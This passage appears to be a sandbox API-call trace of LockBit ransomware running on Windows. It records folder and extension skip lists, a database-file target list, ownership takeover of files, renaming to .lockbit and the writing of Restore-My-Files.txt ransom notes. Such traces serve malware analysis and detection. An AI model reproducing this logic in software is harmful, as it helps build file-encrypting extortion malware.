Shared\\ink\\et-EE\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui.lockbit")) returned 0 [0079.766] GetLastError () returned 0x5 [0079.767] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0079.767] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0079.767] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.767] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0079.767] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0079.767] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b4, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0079.768] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0079.768] NtQueryInformationFile (in: FileHandle=0x3b4, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0079.783] NtClose (Handle=0x3b4) returned 0x0 [0079.783] RtlFreeAnsiString (AnsiString="\\") [0079.783] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b4) returned 1 [0079.783] malloc (_Size=0x200) returned 0x53fcc0 [0079.783] GetTokenInformation (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0079.784] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.784] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.784] CloseHandle (hObject=0x3b4) returned 1 [0079.784] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0079.784] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0079.785] free (_Block=0x53fcc0) [0079.785] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.785] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui.lockbit")) returned 1 [0079.785] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0079.786] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0079.786] malloc (_Size=0x40068) returned 0x206b860 [0079.786] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=4096) returned 1 [0079.786] ReadFile (in: hFile=0x3b4, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0079.792] GetLastError () returned 0x3e5 [0079.792] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\tipresx.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE") returned 1 [0079.792] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\Restore-My-Files.txt") returned 78 [0079.792] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0079.792] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0079.792] malloc (_Size=0x40068) returned 0x3940048 [0079.792] WriteFile (in: hFile=0x3bc, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 0x0 [0079.794] GetLastError () returned 0x3e5 [0079.794] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb4e9cfd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeb74b2cd, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeb74b2cd, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0079.794] GetLastError () returned 0x12 [0079.794] FindClose (in: hFindFile=0x2e3290 | out: hFindFile=0x2e3290) returned 1 [0079.794] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0079.794] lstrcmpiW (lpString1=".", lpString2="fi-FI") returned -1 [0079.794] lstrcmpiW (lpString1="..", lpString2="fi-FI") returned -1 [0079.794] lstrcmpiW (lpString1="fi-FI", lpString2="$windows.~bt") returned 1 [0079.794] lstrcmpiW (lpString1="fi-FI", lpString2="intel") returned -1 [0079.794] lstrcmpiW (lpString1="fi-FI", lpString2="msocache") returned -1 [0079.794] lstrcmpiW (lpString1="fi-FI", lpString2="$recycle.bin") returned 1 [0079.794] lstrcmpiW (lpString1="fi-FI", lpString2="$windows.~ws") returned 1 [0079.794] lstrcmpiW (lpString1="fi-FI", lpString2="tor browser") returned -1 [0079.794] lstrcmpiW (lpString1="fi-FI", lpString2="boot") returned 1 [0079.794] lstrcmpiW (lpString1="fi-FI", lpString2="system volume information") returned -1 [0079.794] lstrcmpiW (lpString1="fi-FI", lpString2="perflogs") returned -1 [0079.794] lstrcmpiW (lpString1="fi-FI", lpString2="google") returned -1 [0079.794] lstrcmpiW (lpString1="fi-FI", lpString2="application data") returned 1 [0079.794] lstrcmpiW (lpString1="fi-FI", lpString2="windows") returned -1 [0079.794] lstrcmpiW (lpString1="fi-FI", lpString2="windows.old") returned -1 [0079.794] lstrcmpiW (lpString1="fi-FI", lpString2="appdata") returned 1 [0079.795] lstrcmpiW (lpString1="fi-FI", lpString2="Windows nt") returned -1 [0079.795] lstrcmpiW (lpString1="fi-FI", lpString2="Msbuild") returned -1 [0079.795] lstrcmpiW (lpString1="fi-FI", lpString2="Microsoft") returned -1 [0079.795] lstrcmpiW (lpString1="fi-FI", lpString2="All users") returned 1 [0079.795] lstrcmpiW (lpString1="fi-FI", lpString2="mozilla") returned -1 [0079.795] wsprintfW (in: param_1=0x344d200, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI") returned 57 [0079.795] wsprintfW (in: param_1=0x344ca60, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*") returned 59 [0079.795] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\*"), fInfoLevelId=0x0, lpFindFileData=0x344cf48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344cf48) returned 0x2e3290 [0079.795] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0079.795] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0079.795] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0079.795] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0079.795] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47dd5b4, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4a64ce1, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4a64ce1, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0079.795] lstrcmpiW (lpString1=".", lpString2="tipresx.dll.mui") returned -1 [0079.796] lstrcmpiW (lpString1="..", lpString2="tipresx.dll.mui") returned -1 [0079.796] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0079.796] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0079.796] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0079.796] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0079.796] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0079.796] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0079.796] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0079.796] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0079.796] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0079.796] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0079.796] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0079.796] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0079.796] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0079.796] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0079.796] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0079.796] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0079.796] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0079.796] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0079.796] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0079.796] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0079.796] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0079.797] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0079.797] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0079.797] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0079.797] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0079.797] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.797] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0079.797] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0079.797] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0079.797] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0079.797] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0079.797] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0079.797] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0079.797] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0079.797] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0079.797] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0079.797] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0079.797] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0079.797] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0079.797] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0079.797] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0079.797] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0079.797] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0079.797] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.797] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0079.797] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0079.798] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0079.798] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0079.798] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="tipresx.dll.mui") returned -1 [0079.798] lstrcmpiW (lpString1="ntldr", lpString2="tipresx.dll.mui") returned -1 [0079.798] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="tipresx.dll.mui") returned -1 [0079.798] lstrcmpiW (lpString1="bootsect.bak", lpString2="tipresx.dll.mui") returned -1 [0079.798] lstrcmpiW (lpString1="autorun.inf", lpString2="tipresx.dll.mui") returned -1 [0079.798] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\") returned="" [0079.798] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui") returned=".mui" [0079.798] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0079.798] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0079.798] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0079.798] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0079.798] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0079.798] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0079.798] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0079.798] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0079.798] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0079.798] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0079.798] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0079.798] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0079.798] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0079.798] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0079.798] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0079.798] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0079.798] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0079.799] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0079.799] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0079.799] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0079.799] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0079.799] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0079.799] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0079.799] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0079.799] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0079.799] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0079.799] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0079.799] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0079.799] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui.lockbit") returned 81 [0079.799] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.799] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui.lockbit")) returned 0 [0079.805] GetLastError () returned 0x5 [0079.805] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0079.805] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0079.805] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.806] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0079.806] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0079.806] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3bc, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0079.806] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0079.806] NtQueryInformationFile (in: FileHandle=0x3bc, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0079.818] NtClose (Handle=0x3bc) returned 0x0 [0079.818] RtlFreeAnsiString (AnsiString="\\") [0079.818] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3bc) returned 1 [0079.818] malloc (_Size=0x200) returned 0x53fcc0 [0079.818] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0079.818] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.818] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.818] CloseHandle (hObject=0x3bc) returned 1 [0079.818] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0079.819] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0079.819] free (_Block=0x53fcc0) [0079.820] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.820] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui.lockbit")) returned 1 [0079.820] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0079.820] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0079.820] malloc (_Size=0x40068) returned 0x20abae0 [0079.820] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=3584) returned 1 [0079.820] ReadFile (in: hFile=0x3bc, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0079.822] GetLastError () returned 0x3e5 [0079.822] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI") returned 1 [0079.822] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\Restore-My-Files.txt") returned 78 [0079.823] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0079.823] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0079.823] malloc (_Size=0x40068) returned 0x3940048 [0079.823] WriteFile (in: hFile=0x3b0, lpBuffer=0x2064f58*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x2064f58*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0079.824] GetLastError () returned 0x3e5 [0079.824] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47dd5b4, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4a64ce1, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4a64ce1, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0079.825] GetLastError () returned 0x12 [0079.825] FindClose (in: hFindFile=0x2e3290 | out: hFindFile=0x2e3290) returned 1 [0079.825] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f4e4a1, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x92f4e4a1, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x92f9a75d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x186b84, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="FlickAnimation.avi", cAlternateFileName="")) returned 1 [0079.825] lstrcmpiW (lpString1=".", lpString2="FlickAnimation.avi") returned -1 [0079.825] lstrcmpiW (lpString1="..", lpString2="FlickAnimation.avi") returned -1 [0079.825] PathFindExtensionW (pszPath="FlickAnimation.avi") returned=".avi" [0079.825] lstrcmpiW (lpString1=".386", lpString2=".avi") returned -1 [0079.825] lstrcmpiW (lpString1=".cmd", lpString2=".avi") returned 1 [0079.825] lstrcmpiW (lpString1=".exe", lpString2=".avi") returned 1 [0079.825] lstrcmpiW (lpString1=".ani", lpString2=".avi") returned -1 [0079.825] lstrcmpiW (lpString1=".adv", lpString2=".avi") returned -1 [0079.825] lstrcmpiW (lpString1=".theme", lpString2=".avi") returned 1 [0079.825] lstrcmpiW (lpString1=".msi", lpString2=".avi") returned 1 [0079.825] lstrcmpiW (lpString1=".msp", lpString2=".avi") returned 1 [0079.825] lstrcmpiW (lpString1=".com", lpString2=".avi") returned 1 [0079.825] lstrcmpiW (lpString1=".diagpkg", lpString2=".avi") returned 1 [0079.825] lstrcmpiW (lpString1=".nls", lpString2=".avi") returned 1 [0079.825] lstrcmpiW (lpString1=".diagcab", lpString2=".avi") returned 1 [0079.825] lstrcmpiW (lpString1=".lock", lpString2=".avi") returned 1 [0079.825] lstrcmpiW (lpString1=".ocx", lpString2=".avi") returned 1 [0079.825] lstrcmpiW (lpString1=".mpa", lpString2=".avi") returned 1 [0079.825] lstrcmpiW (lpString1=".cpl", lpString2=".avi") returned 1 [0079.825] lstrcmpiW (lpString1=".mod", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".hta", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".icns", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".prf", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".rtp", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".diagcfg", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".msstyles", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".bin", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".hlp", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".shs", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".drv", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".wpx", lpString2=".avi") returned 1 [0079.826] lstrcmpiW (lpString1=".bat", lpString2=".avi") 